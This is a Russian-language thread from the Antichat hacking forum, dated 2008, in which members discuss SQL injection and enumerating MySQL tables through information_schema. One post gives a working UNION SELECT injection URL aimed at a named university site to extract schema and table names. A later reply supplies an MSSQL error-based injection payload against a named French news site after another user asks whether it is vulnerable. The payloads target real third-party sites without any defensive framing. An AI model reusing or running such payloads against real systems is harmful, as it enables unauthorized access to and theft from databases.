18.02.2008, 21:35
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
.Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо..
з\ы или тебя сама конструкция запроса смутила?
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
18.02.2008, 21:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Constantine
.Slip я не отвечал на конкретно поставленный вопрос, просто подсказал джокстеру, что точно знать название колонки, для получения имени таблицы содержащий эту колонку не надо..
з\ы или тебя сама конструкция запроса смутила?
Полностью согласен, это как в MSSQL или SYBASE в syscolumns есть информация о объектах которым принадлежат колонки (только там id объекта) а в мускуле именно имя таблицы
__________________
Карфаген должен быть разрушен...
|
|
|
|
18.02.2008, 21:42
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 .Slip
можно даже имя базы оттуда вытащить
пример(бага старая найдена не мной)
_http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6,7,8,9,10,11+from+information_schem a.columns+where+column_name=0x75736572+limit+1,1/*
|
|
|
|
18.02.2008, 21:48
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Сообщение от jokester
2 .Slip
можно даже имя базы оттуда вытащить
пример(бага старая найдена не мной)
_http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,concat(table_schema,char(58), table_name),5,6,7,8,9,10,11+from+information_schem a.columns+where+column_name=0x75736572+limit+1,1/*
Этот прием показывал Grey
|
|
|
|
18.02.2008, 21:46
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Мм.. Дам-с, лоханулся я тут.
|
|
|
|
18.02.2008, 21:49
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
разговор ни о чём
узнать имя таблицы по её содержимому нельзя, а дальше непонятная мне дискуссия про information_schema =\
PS онтечад
|
|
|
|
18.02.2008, 22:05
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
История оценок репутации для Spyder:
+3 Ваши вопросы по уязвимо... 18.02.2008 20:55 ZAMUT если мускул 5.х то можно
Вот покажи мне запрос который вернёт имя таблицы, при том что я не знаю имён колонок и у меня только одно значение 123456. Кто сказал что колонка с паролями имеет в своём имени "pas", мб она называется "paroli"
В таком случае запрос Константина
select+table_name+from+information_schema.c olumns+where+column_name+like+%pas%/*
работать не будет, и вообще это больше похоже на игру "угадай буквы в имени колонки".
Ответ на вопрос 0nep@t0p'a нет, Слип и Scipio правильно написали, узнать таблицу по её содержимому нельзя
|
|
|
|
18.02.2008, 22:08
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Spyder, ну да только угадайка ..
Последний раз редактировалось ZAMUT; 18.02.2008 в 22:13..
Причина: опять перепутал =\
|
|
|
|
18.02.2008, 23:04
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами:
9626078
Репутация:
141
|
|
Код:
http://www.newspress.fr/index.asp?lang=hfg'
собственно что енто уязвимость ? что из этого можно вообше можно выжать если вообше можно ? собственно с таким первый раз сталкиваюсь 
собственно при подставлении в значение ленг сужествуюшего фаыла начинаеть материться под другому тока на французком 
Последний раз редактировалось MaSter GeN; 18.02.2008 в 23:08..
Причина: !!
|
|
|
|
18.02.2008, 23:13
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Это mssql инъекция
http://www.newspress.fr/index.asp?lang='+or+1=@@version--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
